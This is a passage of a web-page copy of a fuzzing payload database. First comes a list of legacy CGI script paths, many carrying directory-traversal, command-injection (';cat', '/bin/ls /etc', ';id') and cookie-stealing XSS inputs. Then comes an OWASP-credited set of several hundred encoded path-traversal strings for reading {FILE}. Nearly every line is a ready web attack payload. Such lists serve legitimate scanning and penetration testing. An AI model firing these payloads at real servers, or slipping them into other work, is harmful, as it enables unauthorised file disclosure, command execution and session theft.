publisher/search.cgi?dir=jobs&template=;cat%20{KNOWNFILE}|&output_number=10<br />
query<br />
query?mss=%2e%2e/config<br />
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&cart_id=<br />
quikstore.cfg<br />
quizme.cgi<br />
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}<br />
ratlog.cgi<br />
redirect<br />
register.cgi<br />
replicator/webpage.cgi/<br />
responder.cgi<br />
retrieve_password.pl<br />
rksh<br />
rmp_query<br />
robadmin.cgi<br />
robpoll.cgi<br />
rpm_query<br />
rsh<br />
rtm.log<br />
rwcgi60<br />
rwcgi60/showenv<br />
rwwwshell.pl<br />
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1<br />
sawmill?rfcf+%22<br />
sbcgi/sitebuilder.cgi<br />
scoadminreg.cgi<br />
scripts/*%0a.pl<br />
search.cgi<br />
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini<br />
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini<br />
search.php?searchstring=<script>alert(document.cookie)</script><br />
search.pl<br />
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script><br />
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00<br />
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc<br />
sendform.cgi<br />
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message<br />
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}<br />
session/adminlogin<br />
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}<br />
sh<br />
shop.cgi?page=../../../../../../..{KNOWNFILE}<br />
shop.pl/page=;cat%20shop.pl|<br />
shop/auth_data/auth_user_file.txt<br />
shop/orders/orders.txt<br />
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}<br />
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20{KNOWNFILE}|<br />
show.pl<br />
showcheckins.cgi?person=<script>alert('XSS')</script><br />
showuser.cgi<br />
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|<br />
simplestguest.cgi<br />
simplestmail.cgi<br />
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|<br />
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|<br />
sojourn.cgi?cat=../../../../../../../../../../etc/password%00<br />
spin_client.cgi?aaaaaaaa<br />
ss<br />
sscd_suncourier.pl<br />
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}<br />
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E<br />
stat.pl<br />
stat/<br />
stats-bin-p/reports/index.html<br />
stats.pl<br />
stats.prf<br />
stats/<br />
stats/statsbrowse.asp?filepath=c:\&Opt=3<br />
stats_old/<br />
statsconfig<br />
statusconfig.pl<br />
statview.pl<br />
store.cgi?<br />
store/agora.cgi?cart_id=<script>alert('XSS')</script><br />
store/agora.cgi?page=whatever33.html<br />
store/index.cgi?page=../../../../../../../..{KNOWNFILE}<br />
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00<br />
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00<br />
survey<br />
survey.cgi<br />
sws/admin.html<br />
sws/manager.pl<br />
tablebuild.pl<br />
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&action=view&matchview=1<br />
tcsh<br />
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../..{KNOWNFILE}<br />
test-cgi.tcl<br />
test-cgi?/*<br />
test-env<br />
test.cgi<br />
test/test.cgi<br />
texis/junk<br />
texis/phine<br />
textcounter.pl<br />
tidfinder.cgi<br />
tigvote.cgi<br />
title.cgi<br />
tpgnrock<br />
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
troops.cgi<br />
ttawebtop.cgi/?action=start&pg=../../../../../../../../../..{KNOWNFILE}<br />
ultraboard.cgi<br />
ultraboard.pl<br />
unlg1.1<br />
unlg1.2<br />
update.dpgs<br />
upload.cgi<br />
uptime<br />
urlcount.cgi?%3CIMG%20<br />
ustorekeeper.pl?command=goto&file=../../../../../../../../../..{KNOWNFILE}<br />
utm/admin<br />
utm/utm_stat<br />
view-source<br />
view-source?view-source<br />
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00<br />
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script><br />
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\<br />
viewlogs.pl<br />
viewsource?{KNOWNFILE}<br />
viralator.cgi<br />
virgil.cgi<br />
vote.cgi<br />
vpasswd.cgi<br />
vq/demos/respond.pl?<script>alert('XSS')</script><br />
w3-msql<br />
w3-sql<br />
wais.pl<br />
way-board.cgi?db={KNOWNFILE}%00<br />
way-board/way-board.cgi?db={KNOWNFILE}%00<br />
webais<br />
webbbs.cgi<br />
webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20{KNOWNFILE}<br />
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE<br />
webdist.cgi?distloc=;cat%20{KNOWNFILE}<br />
webdriver<br />
webgais<br />
webif.cgi<br />
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
webmap.cgi<br />
webnews.pl<br />
webplus?about<br />
webplus?script=../../../../../../../../../..{KNOWNFILE}<br />
websendmail<br />
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}<br />
webutil.pl<br />
webutils.pl<br />
webwho.pl<br />
where.pl?sd=ls%20/etc<br />
whois.cgi?action=load&whois=%3Bid<br />
whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}<br />
whois/whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}<br />
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}<br />
windmail<br />
wrap<br />
wrap.cgi<br />
ws_ftp.ini<br />
www-sql<br />
wwwadmin.pl<br />
wwwboard.cgi.cgi<br />
wwwboard.pl<br />
wwwstats.pl<br />
wwwthreads/3tvars.pm<br />
wwwthreads/w3tvars.pm<br />
wwwwais<br />
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00<br />
zsh<br />
</pre><br />
<br />
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===<br />
<pre><br />
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) <br />
# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni<br />
# Did some cleanup & removed anything to the right of {FILE} for inclusion in a<br />
# separate fuzzfile for more flexibility, for the OWASP Fuzzing Code Database.<br />
# adam.muntner@uietmove.com <br />
<br />
../{FILE}<br />
../../{FILE}<br />
../../../{FILE}<br />
../../../../{FILE}<br />
../../../../../{FILE}<br />
../../../../../../{FILE}<br />
../../../../../../../{FILE}<br />
../../../../../../../../{FILE}<br />
..%2f{FILE}<br />
..%2f..%2f{FILE}<br />
..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
..%252f{FILE}<br />
..%252f..%252f{FILE}<br />
..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
..\{FILE}<br />
..\..\{FILE}<br />
..\..\..\{FILE}<br />
..\..\..\..\{FILE}<br />
..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\..\{FILE}<br />
..%255c{FILE}<br />
..%255c..%255c{FILE}<br />
..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%5c..%5c{FILE}<br />
..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
..%c0%af{FILE}<br />
..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
..%%32%66{FILE}<br />
..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
